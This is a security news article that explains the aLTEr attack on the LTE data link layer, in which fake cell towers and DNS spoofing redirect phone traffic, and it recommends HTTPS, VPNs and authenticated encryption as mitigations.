Modern Cell Networks are Vulnerable to Nasty LTE Exploit

LTE is one of the most common cellular network technologies in the world right now. If you used your smartphone today, it’s highly likely that you used an LTE network. LTE networks are deployed in most countries worldwide, and countries such as the United States, South Korea, and Japan have over 90% LTE penetration.

My phone definitely uses LTE. I use a VPN for my phone, and I make sure that I use HTTPS instead of HTTP on the web as much as possible. Here’s a good reason why: a new LTE exploit has been discovered which puts your phone and its sensitive data at risk. It was discovered by researchers David Rupprecht, Katharina Kohls, Thorsten Holz, and Christina Pöpper from Ruhr-Universität Bochum and New York University Abu Dhabi.

As reported in The Register:

“Senator Wyden asked whether the DHS has the capability to detect 4G/LTE IMSI catchers, capable of surveilling recent model phones. The NPPD responded that it's not aware how it would detect such technology and that if detection tech exists. According to the American Civil Liberties Union, 73 agencies in 25 states and the District of Columbia own IMSI catchers, though the advocacy organization suggests the devices may be more widespread because government agencies often conceal such purchases. As for the number of devices operated by foreign spies and the like, that's still being worked out.”

And IMSI catchers are just one type of fake cellular tower device that can be purchased by criminals from the black market.

Here’s How the aLTEr Exploit Works

The researchers call the exploit “aLTEr,” and here’s how they introduce it in their paper:

“Previous work on LTE protocol security identified crucial attack vectors for both the physical (layer one) and network (layer three) layers. Data link layer (layer two) protocols, however, remain a blind spot in existing LTE security research.”

First, a cyber attacker needs to deploy a fake cellular tower. Fake cell towers are actually quite common. IMSI catchers are one type of fake cell tower device, and they can be purchased. Washington DC alone probably has lots of them.

So, the attacker deploys a fake cell tower, which can then target any phone within its signal radius. The researchers believe that the fake cell towers that can be used to execute an aLTEr attack may have a range of up to two kilometres. In an urban area like my hometown of Toronto, any of thousands of phones could potentially be attacked using this method.

Like conventional computer networks, cellular networks can be divided according to the OSI layer model. The aLTEr exploit targets Layer 2, the data link layer of an LTE signal. That layer corrects transmission errors, organizes multiuser network access, and encrypts data. In LTE, the layers above the data link layer have mutual authentication, which prevents connections to malicious networks. But the technologies below the data link are unprotected.

Types of aLTEr Exploit Attacks

aLTEr can exploit the data link layer to conduct malicious activities such as redirecting packets which were destined for legitimate websites to phishing websites which can steal user credentials.

LTE networks deployed by major telecommunications providers can be spoofed into thinking that a fake tower is a legitimate user. Meanwhile, the targeted smartphone thinks that the fake cell tower is legitimate, and the user is none the wiser.

If the cyber attacker can acquire plaintext from their targeted phone’s network transmissions, they can modify the packet’s headers even if it becomes encrypted. That’s because the entities below data link aren’t integrity protected.

Modifying the headers enables DNS spoofing attacks, which can use a DNS server that’s under a cyber attacker’s control. Through the malicious DNS server, the attacker can redirect the user’s Internet traffic to their own malicious Internet servers by their IP addresses, not only web servers. Any Internet service which can use domain names may be vulnerable.

Through an attacker’s malicious Internet servers, malware can be sent, man-in-the-middle attacks (MITM) can be performed, and sensitive credentials can be stolen. There is no way to patch LTE from this exploit, and it’s a way that individual LTE users can be targeted, especially high value targets like politicians and celebrities. aLTEr’s victims do need to be specifically targeted, though.

HTTPS and VPNs Can Mitigate These Attacks

LTE is considered to be a 4G cell technology. Is 5G vulnerable to similar attacks? Here’s what the researchers have to say:

“The use of authenticated encryption would prevent the aLTEr attack, which can be achieved through the addition of message authentication codes to user plane packets. However, the current 5G specification does not require this security feature as mandatory, but leaves it as optional configuration parameter.”

The researchers contacted the GSMA on March 1, and then the GSMA informed network providers about the aLTEr vulnerability. So, this makes it more likely that new 5G network deployments will be less vulnerable to exploits like aLTEr.